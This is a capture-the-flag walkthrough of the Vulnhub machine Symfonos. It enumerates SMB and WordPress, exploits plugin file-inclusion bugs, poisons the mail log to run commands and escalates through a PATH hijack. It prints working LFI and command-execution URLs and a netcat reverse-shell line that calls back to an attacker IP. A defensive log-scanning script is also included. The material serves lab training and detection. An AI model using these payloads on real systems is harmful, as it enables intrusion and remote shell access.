# Vulnhub-Symfonos
## Rustscan
```bash
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after: 2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:41:21:96 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 139/445 (SMB)
I ran `smbmap` to see which shares I have read access to as an anonymous user.
So we only have read access to the `anonymous` share.
We can see a text file there, so let's download it using `GET`.
This looks like a list of potential passwords we can use when brute forcing, and we also have a username, `zeus`.
Let's run `enum4linux-ng` to enumerate users.
We only get one user, `helios`.
## PORT 80 (HTTP)
On the web server we see this weird image.
There's nothing in the source either, so I started fuzzing for files and directories using `dirsearch`.
But I found nothing, so brute forcing is the last resort, and this is what I'll be doing: we have a username, so we could try to brute force against those 3 passwords, and if that fails I'll move to rockyou.txt.
It failed, so let's try these 3 passwords on SMB as `helios`.
The first password failed but the second worked, and we can access his share now.
After reading `todo.txt` we get a hidden directory.
So this is a WordPress site but the CSS isn't loaded; we can fix it by looking at where it's grabbing the CSS file from.
We need to add the domain `symfonos.local` to the `/etc/hosts` file.
Now it looks better, so let's enumerate the WordPress site; for that I am going to use `wpscan`.
We have a user `admin`, so we could brute force his password.
I'll also run a scan to enumerate the plugins being used on the WordPress site.
We can see two plugins, `mail-masta` and `site-editor`. First I am going to search for any exploits for mail-masta.
And it seems we found an LFI exploit for mail-masta.
Let's give it a try by reading the `/etc/passwd` file through the LFI.
And boom, we have an LFI vulnerability here.
The other plugin is also vulnerable to LFI.
Now, we know that port 25 (SMTP) is open, so we could see if we can poison its log files. Visiting HackTricks, I found that it's possible:
```
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios
```
We can read the logs, so it's possible. I followed this article in order to do SMTP log poisoning:
https://liberty-shell.com/sec/2018/05/19/poisoning/
The sender's mail is just what I saw in the logs, so I put that there, but the important thing to note is the subject we are sending, which is the GET parameter that gets executed as a shell command. Now we add that parameter alongside the path of the log file:
```
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&pwn=id
```
So let's just get a shell with `netcat`:
```
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&hello=nc 192.168.1.2 2222 -e /bin/bash
```
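From the defender's side, the requests above leave a distinctive trace in the Apache access log: a parameter carrying a traversal sequence or an absolute path to a sensitive file, and a mail-spool/log path combined with extra parameters, which is what the log-poisoning step looks like. As an added example (not part of the original write-up), here is a small Python detector that flags those patterns; the log lines are constructed, and only the plugin path is taken from this write-up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log: client ident user [timestamp] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SENSITIVE_PREFIXES = ("/etc/", "/var/mail/", "/var/log/", "/proc/")
LOG_PREFIXES = ("/var/mail/", "/var/log/")  # spool/log files used in the poisoning step

# Constructed sample lines (not real traffic); the plugin path is the one from the write-up.
PLUGIN = "/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"
SAMPLE_LOG = f"""\
10.0.0.5 - - [29/Jun/2019:10:01:02 +0000] "GET {PLUGIN}?ajax_path=/var/mail/helios&pwn=id HTTP/1.1" 200 1532 "-" "curl/7.64.0"
10.0.0.5 - - [29/Jun/2019:10:01:03 +0000] "GET {PLUGIN}?ajax_path=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2541 "-" "Mozilla/5.0"
10.0.0.7 - - [29/Jun/2019:10:02:00 +0000] "GET /h3l105/?p=1 HTTP/1.1" 200 7102 "-" "Mozilla/5.0"
"""

def inspect_request(line):
    """Parse one access-log line; return a dict with any LFI findings, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    params = parse_qs(target.query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once already; undo a second layer of encoding
            if ".." in value.replace("\\", "/").split("/"):
                findings.append(f"directory traversal in '{name}'")
            if value.startswith(SENSITIVE_PREFIXES):
                findings.append(f"absolute path to a sensitive file in '{name}'")
            if value.startswith(LOG_PREFIXES) and len(params) > 1:
                findings.append("log/spool path plus extra parameters (log poisoning pattern)")
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "path": target.path, "findings": findings}

def scan(log_text):
    """Return only the flagged requests from a block of access-log text."""
    return [r for r in map(inspect_request, log_text.splitlines()) if r and r["findings"]]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["path"], "|", "; ".join(hit["findings"]))
```

A 200 status on a flagged request is the signal worth alerting on, since it means the include actually succeeded rather than being blocked.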
Now we check if we have permission to run any command with sudo using `sudo -l`.
No sudo :\
Let's check for any SUID binaries.
We found `/opt/statuscheck`. Running the binary results in it making a request.
Let's analyze the binary further, if `strings` is installed on the machine.
It is available, so we can see what the binary is doing.
The binary is using the command `curl http://localhost`, so we can exploit the PATH variable here by making a fake `curl` binary that runs `bash` and putting its directory in the PATH variable.
However, if we run it, we won't get a root shell.
I then tried to make bash SUID.
It gave me an error, and I was not sure why this wasn't working, so I just removed the shebang line.
Ran it again.
And boom, we have made bash SUID.